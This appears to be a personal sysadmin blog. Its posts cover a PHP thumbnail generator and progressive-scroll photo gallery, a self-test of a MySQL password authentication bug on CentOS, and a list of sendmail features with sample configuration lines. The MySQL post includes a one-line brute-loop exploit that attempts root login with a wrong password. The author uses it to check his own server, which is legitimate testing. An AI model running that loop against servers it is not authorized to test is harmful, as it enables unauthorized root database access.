As previously documented, I use GoodSync to sync all my home pictures to my server. So all the pictures are present in various folders. But they’re big. I needed thumbnails for this gallery app, so I wrote a very crude thumbnail generator. I basically have to edit it each time I work on a different directory; one day I’ll fix it up. I call it createthumbs.php:

<?php
function createThumbs( $pathToImages, $pathToThumbs, $thumbWidth )
{
  // open the directory
  $dir = opendir( $pathToImages );
 
  // loop through it, looking for any/all JPG files:
  while (false !== ($fname = readdir( $dir ))) {
    // parse path for the extension
    $info = pathinfo($pathToImages . $fname);
    // continue only if this is a JPEG image
    if ( strtolower($info['extension']) == 'jpg' )
    {
      echo "Creating thumbnail for {$fname} <br />";
 
      // load image and get image size
      $img = imagecreatefromjpeg( "{$pathToImages}{$fname}" );
      $width = imagesx( $img );
      $height = imagesy( $img );
 
      // calculate thumbnail size
      $new_width = $thumbWidth;
      $new_height = floor( $height * ( $thumbWidth / $width ) );
 
      // create a new temporary image
      $tmp_img = imagecreatetruecolor( $new_width, $new_height );
 
      // copy and resize old image into new image
      imagecopyresized( $tmp_img, $img, 0, 0, 0, 0, $new_width, $new_height, $width, $height );
 
      // save thumbnail into a file
      imagejpeg( $tmp_img, "{$pathToThumbs}{$fname}" );
    }
  }
  // close the directory
  closedir( $dir );
}
// call createThumb function and pass to it as parameters the path
// to the directory that contains images, the path to the directory
// in which thumbnails will be placed and the thumbnail's width.
// We are assuming that the path will be a relative path working
// both in the filesystem, and through the web for links
createThumbs("img/2012_05/","thumb/",200);
?>

Notice these are pretty big thumbnails – 200 pixels. That’s how the gallery program works best, and I think it is a good size for how you will want to browse your pictures.

Then I moved the original img directory to img.orig and made a symbolic link to one of my picture folders (which I had run through the thumbnail generator).

img -> /homepic/pictures_chronological/2012_05/
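
In other words, something like:

$ mv img img.orig
$ ln -s /homepic/pictures_chronological/2012_05/ img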

It worked. But there were a couple of annoying things. First, the picture order seemed nearly random. Apparently the order reflected the timestamps of the files, not a sort-by-name order. I found it was simple to sort them by name, which produced a nice, sensible order, by adding:

...
// sensible sort
$sortbool = sort($files,SORT_STRING);
...

to getImages.php.

The other annoying thing was the infinite scroll. I’m not sure what the attraction of that was. Many comments on his post asked how to turn it off. Turns out that was easy:

// prevent annoying infinite scroll
//$response = $response.$files[$i%count($files)].';';
$response = $response.$files[$i].';';

in the same file.

One astute user noticed the lack of input validation in the argument to GET, which should always be a non-negative integer. So I incorporated his suggestion for argument validation as well.

The full getImages.php file is here:

<?php
// input argument validation - only numbers permitted
function filter($data) {
if(is_numeric($data)) {
  return $data;
}
  else { header("Location: index.html"); }
}
 
        $dir = "thumb";
        if(is_dir($dir)){
                if($dd = opendir($dir)){
                        while (($f = readdir($dd)) !== false)
                                if($f != "." && $f != "..")
                                        $files[] = $f;
                        closedir($dd);
                }
// sensible sort
$sortbool = sort($files,SORT_STRING);
 
 
        $n = filter($_GET["n"]);
        $response = "";
                for($i = $n; $i<$n+12; $i++){
// prevent annoying infinite scroll
                        //$response = $response.$files[$i%count($files)].';';
                        $res = $files[$i];
                        if  (isset($res)) $response = $response.$res.';';
                }
                echo $response;
        }
?>

I’ve only run a couple of tests on a couple of folders, but in both cases the gallery showed all the pictures and then stopped scrolling, as you naturally would want. That’s why I call what I have produced a progressive scroll rather than an infinite scroll; the useful progressive-loading part of the original code was preserved.

I think he even used bigger thumbnails than 200 pixels. For these smaller ones it makes more sense to grab pictures 12 at-a-time. So I made a few changes in index.html to take care of that.

Alexandru also had his first nine images hard-coded into his index.html. Again, I don’t see the point in that – it makes it a lot harder to generalize. So I chucked that and appropriately modified some offsets, etc., without any terrible side effects.

Putting it all together that code now looks like this:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1.0, minimum-scale=1.0" />
<title>Web Gallery | Progressive Sroll</title>
<link rel="stylesheet" href="style.css" />
</head>
 
<body onload="setInterval('scroll();', 250);">
<div id="header">Web Gallery | Progressive Scroll</div>
<div id="container">
</div>
</body>
</html>
<script>
//var contentHeight = 800;
var contentHeight = document.getElementById('container').offsetHeight;
var pageHeight = document.documentElement.clientHeight;
var scrollPosition;
var n = 0;
var xmlhttp;
 
function putImages(){
 
        if (xmlhttp.readyState==4)
          {
                  if(xmlhttp.responseText){
                         var resp = xmlhttp.responseText.replace("\r\n", "");
                         var files = resp.split(";");
                          var j = 0;
                          for(i=0; i<files.length; i++){
                                  if(files[i] != ""){
                                         document.getElementById("container").innerHTML += '<a href="img/'+files[i]+'"><img
 src="thumb/'+files[i]+'" /></a>';
                                         j++;
 
                                         if(j == 3 || j == 6 || j == 9)
                                                  document.getElementById("container").innerHTML += '<br />';
                                          else if(j == 12){
                                                  document.getElementById("container").innerHTML += '<p>'+(n-1)+" Images Di
splayed | <a href='#header'>top</a></p><br /><hr />";
                                                  j = 0;
                                          }
                                  }
                          }
                          if (i < 12) document.getElementById("container").innerHTML += '<p>'+(n-13+i)+" Images Displayed | <a href='#header'>top</a></p><br />";
                  }
          }
}
 
 
function scroll(){
 
        if(navigator.appName == "Microsoft Internet Explorer")
                scrollPosition = document.documentElement.scrollTop;
        else
                scrollPosition = window.pageYOffset;
 
        if((contentHeight - pageHeight - scrollPosition) < 200){
 
                if(window.XMLHttpRequest)
                        xmlhttp = new XMLHttpRequest();
                else
                        if(window.ActiveXObject)
                                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
                        else
                                alert ("Bummer! Your browser does not support XMLHTTP!");
 
                var url="getImages.php?n="+n;
 
                xmlhttp.open("GET",url,true);
                xmlhttp.send();
 
// 12 pictures at a time...
                n += 12;
                xmlhttp.onreadystatechange=putImages;
                contentHeight = document.getElementById('container').offsetHeight;
                //contentHeight += 800;
        }
}
 
</script>

Notice I also played around with the scroll() function, because that gave me difficulty. I set the condition contentHeight – pageHeight – scrollPosition to be less than 700 – a requirement that is easier to meet – since in my tests I was often getting no scrolling whatsoever.

That’s it!

So to use my improvements you could download the source files from Alexandru’s site, then overwrite getImages.php and index.html from a cut-and-paste from this page.

To do list…
Naturally the first person to try it tried from an Android Smartphone using the Opera browser and it only showed him the first 12 pictures and didn’t do any scrolling. I developed for IE/FF on PC. I’ve just now tried Opera on PC and that worked fine. I’ll have to understand what is happening on Smartphones. So…I learned there is webkit for Smartphone compatibility. I added a meta tag concerning viewport (which I’ve already included in the html source file above). Now the pictures are a little large on my Android browser, and the progressive scrolling takes a nudge to get going, but it basically does work, which is an improvement. But still not on Opera mini! And not that well on Blackberry…

I’d also like to add a folder-browser plug-in.

Conclusion
Pages load fast initially in a progressive scroll approach. So this could be a useful program as a way to display your pictures on your own web site. We fixed up some of the undesirable behaviour of Alexandru’s original version.

Categories
Admin

Mysql Exploit: v. 5.1.61 on CentOS 6 does not appear vulnerable

Intro
As this story makes crystal clear, the test for the mysql password bug is ridiculously simple to run for yourself:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

More on that
I am at version 5.1.61:

$ mysql --version

I fully expected to get a mysql> prompt from the above exploit code but I did not.

The Amazon cloud has some decent protections in place.

For instance I tried

$ mysql -u root --password=mysecretpassword -h 127.0.0.1 2>/dev/null

and of course I got in. But modified slightly, to

$ mysql -u root --password=mysecretpassword -h drjohnstechtalk.com 2>/dev/null

and it’s a no go. It just hangs. I can’t believe I never did this earlier, but I wanted to see the routing for my own elastic IP:

$ traceroute drjohnstechtalk.com

traceroute to drjohnstechtalk.com (50.17.188.196), 30 hops max, 60 byte packets
 1  ip-10-10-216-2.ec2.internal (10.10.216.2)  0.343 ms  0.506 ms  0.504 ms
 2  ip-10-1-54-93.ec2.internal (10.1.54.93)  0.571 ms ip-10-1-42-93.ec2.internal (10.1.42.93)  0.565 ms ip-10-1-52-93.ec2.internal (10.1.52.93)  0.366 ms
 3  ip-10-1-39-14.ec2.internal (10.1.39.14)  0.457 ms ip-10-1-41-14.ec2.internal (10.1.41.14)  0.515 ms ip-10-1-37-14.ec2.internal (10.1.37.14)  0.605 ms
 4  216.182.224.84 (216.182.224.84)  0.662 ms 216.182.224.86 (216.182.224.86)  0.606 ms  0.608 ms
 5  216.182.232.53 (216.182.232.53)  0.837 ms 216.182.224.89 (216.182.224.89)  0.924 ms 216.182.232.53 (216.182.232.53)  1.030 ms
 6  ip-10-1-41-13.ec2.internal (10.1.41.13)  0.869 ms ip-10-1-39-13.ec2.internal (10.1.39.13)  1.082 ms ip-10-1-43-13.ec2.internal (10.1.43.13)  1.154 ms
 7  ip-10-1-36-94.ec2.internal (10.1.36.94)  1.481 ms ip-10-1-54-94.ec2.internal (10.1.54.94)  1.351 ms ip-10-1-42-94.ec2.internal (10.1.42.94)  1.173 ms
 8  * * *
 9  * * *
10  * * *
...

So there’s quite a few hops before I hit my own IP! That’s plenty of hops in which to insert a firewall, which I suppose they do, to enforce my personal security policy.

My eth0 IP is 10.10.219.96. Using that:

$ mysql -u root --password=mysecretpassword -h 10.10.219.96

I get:

ERROR 1130 (HY000): Host 'ip-10-10-219-96.ec2.internal' is not allowed to connect to this MySQL server

even though my my.cnf file does not have this apparent restriction and the mysql daemon is listening on all interfaces:

$ netstat -an|grep LISTEN

...
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN
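
If I did want to lock that down, the usual approach – not something I have actually configured here – is to tell mysqld to listen only on the loopback interface in /etc/my.cnf:

[mysqld]
bind-address = 127.0.0.1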

Conclusion
I don’t recall taking special steps to secure my mysql installation, though it’s not out of the question. So I conclude that in spite of the articles that cite my version as being vulnerable, it is not, at least under CentOS 6 – and even if it were, it would be especially hard to exploit on an Amazon cloud server.

Categories
Linux

54 Popular sendmail Features

Intro
Thinking of replacing sendmail? Or switching to sendmail? Here are 54 features I find useful in the way I implement sendmail.

In a poorly ordered listing, we have:

– minimal acceptable delivery speed: 100 messages/sec
– queue deletion after 3 days (customizable)
– customizable timers on:
  – time to wait for initial connection
  – time to wait for response to MAIL command
  – time to wait for response to QUIT
  – time to wait for response to RCPT TO command
  – time to wait for response to RSET command
  – time to wait for response to other SMTP commands
– ability to turn off identd usage
– customizable greeting
– ability to deliver local mail for error situations such as looping mail, invalid sender + invalid recipient
– ability to detect looping messages and log and remove them
– errors in MIME format
– configurable maximum message size
– configurable maximum number of recipients per message
– configurable minimum queue age before delivery is re-tried
– configurable address operator characters
– ability to set multiple names for this host
– support for alias address transformations
– support for domain aliasing
– configurable load average at which new messages are refused
– configurable load average at which new messages are queued for later delivery
– configurable load average at which SMTP responses are delayed

– ability to run TLS as server and client, and use a CA-issued certificate
– use of fast table lookups to efficiently handle tables with thousands of entries
– configurable mail relaying decisions based on recipient domain
– ability to turn off UUCP routing
– ability to avoid canonification of recipient domain
– ability to re-write sender address
– ability to make mail relaying decisions based on sender address as well as sender domain
– ability to allow only selected domains/IPs/subnets to relay mail
– ability to reject messages to specified recipients/domains with custom message
– ability to silently discard messages to specific recipients/domains
– ability to discard or reject messages from specific senders or sender domains
– ability to set custom error number for rejected email
– support for mass-import and mass alteration of table entries (e.g., to mail routing/access/alias lists)
– ability to restrict mail relaying to all but a positive match list of IP addresses, subnets and FQDNs
– ability to accept unresolvable domains
– ability to run multiple instances, each with independent configuration, with separate IPs, on same appliance
– ability to make mail routing delivery decisions based on recipient domain configurable by MX lookup, set IP address, FQDN with and without MX lookups
– ability to route all else via DNS lookup
– ability to include comments within the configuration
– ability to turn off ESMTP delivery agent to selected domains and act as simple SMTP delivery agent
– ability to send hourly reports
– log available in real time
– log containing at least these fields: sender, recipients, date/time, delay, size, messageId, TLS used flag, sending MTA, relay MTA, reject reason (if applicable)
– ability to analyze logs with RegEx
– ability to archive logs for up to three months
– ability to send test message through itself with customizable subject on periodic basis
– ability to report on queue contents by top sender/recipient/recipient domain
– ability to force delivery retry on selected domain
– ability to set greeting delay for selected IPs and subnets
– ability to run a browser from same IP as used by the MTA

Most, but not all, of these features are configured in the .mc file. A few are actually references to external programs I developed. A few rely on the Linux environment that sendmail runs under.
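
To give a flavor, here are a few representative lines of the kind that go into the .mc file for some of the items above – the values are illustrative, not my production settings:

define(`confMAX_MESSAGE_SIZE',`20000000')dnl maximum message size in bytes
define(`confMAX_RCPTS_PER_MESSAGE',`100')dnl maximum recipients per message
define(`confTO_ICONNECT',`30s')dnl time to wait for the initial connection
define(`confTO_QUEUERETURN',`3d')dnl queue deletion (bounce) after 3 days
define(`confQUEUE_LA',`8')dnl load average at which new messages are queued for later delivery
define(`confREFUSE_LA',`12')dnl load average at which new connections are refused
FEATURE(`access_db')dnl table-driven relay/reject/discard decisions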

Conclusion
When you sit down and document it, there’s a lot going on in sendmail.